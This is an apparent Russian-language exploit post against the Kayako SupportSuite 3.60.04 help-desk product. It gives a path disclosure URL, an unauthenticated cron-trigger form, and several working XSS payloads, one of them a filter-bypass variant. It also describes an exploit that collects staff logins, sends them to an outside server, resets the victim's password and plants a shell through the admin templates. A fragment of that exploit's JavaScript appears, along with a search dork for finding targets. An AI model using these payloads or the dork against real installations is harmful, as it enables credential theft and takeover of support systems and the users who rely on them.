[Product]
######################################
Kayako SupportSuite version 3.60.04
[Url]
######################################
http://www.kayako.com/solutions/supportsuite/
[Path Disclosure]
######################################
http://supportsite/rss/index.php?_m=tickets&_a=view&group=default
Fatal error: view action is not registered in
\includes\functions.php on
line 754
P.S. Только если не давится вывод ошибок
[Cron]
######################################
Неавторизованный запуск задач внутреннего крона данного продукта
<form action="http://supportsite/cron/index.php" method="post">
<input value="d" name="_t">
<input type="submit">
</form>
Пример: tickets
При ссылке в action: http://supportsite/cron/index.php?debug=1
Получаем:
======== cron_autoclose.php ========
1: Autoclose system is enabled, starting up…
2: List of autoclose statuses:
3: List of departments monitored by autoclose system:
4: Auto close target status: NNN
5: ======== end cron_autoclose.php ========
Как использовать не придумал.
[Xss]
######################################
Не фильтруется название темы [пример темы:
<script>alert('xss')</script>] в
тикете, и при обращении по ссылке [Post Reply][
http://supportsite/index.php?_m=tickets&_a=postreply&ticketid=NNN]
отрабатывает XSS
<a href="http://evilsite/evipage.html">Link text</a>
где возможно размещение iframe с кодом
http://supportsite/staff/index.php?_m=tickets&_a=reports&type=department&datefrom=0
"><script>alert('xss')</script><t
[Exploit]
######################################
Не фильтруются XSS вида <scr<img>ipt>alert('xss')</scr<img>ipt>
Тоже xss, позволяет пользователю отправить тикет со скриптом
внутри, который
выполнит любой сценарий с правами залогиненного администратора или
стаффа
Также при любом типе стаффа можно узнать все логины, имеющиеся в
системе,
используя информацию со страницы с отправкой приватных сообщений.
Ну и используя вышеперечисленное, написал сплоит, который берет
все логины
из системы, снифит их на внешний сервер, и меняет пароль того, под
кем был
просмотрен тикет
В том случае, если пользователь имеет права администратора (можно
определить
по значениям id в cookie), то возможно влить шелл через изменение
темплейтов
в админке.
'newpass';window.frames['passframe'].document.forms['staffform'].submit();document.getElementById('change2').value
= 1;}}</sc<img>ript>
[Dork]
######################################
Kayako SupportSuite